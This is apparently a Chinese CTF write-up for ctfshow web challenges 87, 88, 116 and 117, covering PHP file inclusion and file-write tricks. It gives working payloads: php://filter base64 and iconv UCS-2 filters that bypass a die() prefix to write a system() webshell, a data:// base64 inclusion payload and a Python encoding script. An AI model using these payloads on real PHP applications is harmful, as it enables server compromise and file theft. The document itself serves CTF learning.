ctfshow web入门 web87--web88&&web116--web117

web87

神奇这道题我写了一个小时终于写好了
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);:整个函数调用的作用是将解码后的 file 作为目标文件路径,然后将前面定义的终止执行提示语句与 content 的内容拼接起来,一起写入到目标文件中。
意思是要进行url解码然后再写文件 并且要绕过死亡(file_put_content

content是写入内容,要进行base64编码 ,而base解码时,是4个一组,flag.php(要写入的文件),写入的内容<?php die('大佬别秀了');?>,只有phpdie会参与base64解码,因为phpdie只有6个字节,补两个a就是8字节了再与我们写的命令内容进行拼接

下面这篇文章是绕过死亡的
https://xz.aliyun.com/t/8163?time__1311=n4%2BxuDgDBDyGKAKD%3DD7Dl1oQ4iK4%2BD0KqPPoqx&alichlgref=https%3A%2F%2Fxz.aliyun.com%2Ft%2F8163#toc-2

构造payload

php 复制代码
/?file=php://filter/write=convert.base64-decode/resource=1.php

两次URL编码(浏览器(hackbar)一次,题目绕过一次)为

php 复制代码
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

(工具用的bp的编码器,这个编码器我找了好久好久)

php 复制代码
<?php system('ls');?>

进行base64编码

复制代码
PD9waHAgc3lzdGVtKCdscycpOz8+

POST传参content=aaPD9waHAgc3lzdGVtKCdscycpOz8+
然后查看fl0g.php

php 复制代码
<?php system('tac fl0g.php');?>
复制代码
PD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg==
php 复制代码
content=aaPD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg==

web88

php伪协议进行绕过(但是编码的时候必须绕过=和+)
欧克了这样子就没有了

php 复制代码
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PnNz

web116

是一个视频利用winhex分离源码(我还没下载具体步骤后面补充)

这里借图一用

正则匹配但是最后一句file_get_content($file);直接打开file这个文件

php 复制代码
?file=flag.php

抓包发送
到手

web117

用php伪协议绕过但是常见的编码都被过滤这里有一种新的编码

iconv.UCS-2LE.UCS-2BE编码就是把每两位字符换位。

php 复制代码
?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=1.php

编码脚本

python 复制代码
str = "<?=system('tac f*');"
str_encoded = ''
for i in range(len(str)):
    if i % 2 == 1:
        str_encoded += str[i]
        str_encoded += str[i-1]
print(str_encoded) 		# ?<s=syet(mt'caf '*;)
php 复制代码
content=?<s=syet(mt'caf '*;)

然后访问1.php
到手

相关推荐
zhu12893035562 小时前
网络安全防护与挑战
网络·安全·web安全
神经毒素3 小时前
WEB安全--文件上传漏洞--36C3 CTF includer bypass
linux·安全·web安全
网络安全指导员6 小时前
如何在JMeter中配置断言,将非200状态码视为测试成功
网络·学习·jmeter·安全·web安全·架构
Sean_summer9 小时前
木马学习记录
web安全
ALe要立志成为web糕手2 天前
SESSION_UPLOAD_PROGRESS 的利用
python·web安全·网络安全·ctf
zhu12893035562 天前
网络安全的现状与防护措施
网络·安全·web安全
zhu12893035562 天前
网络安全与防护策略
网络·安全·web安全
virelin_Y.lin2 天前
系统与网络安全------Windows系统安全(1)
windows·安全·web安全·系统安全
zhu12893035562 天前
网络安全基础与防护策略
网络·安全·web安全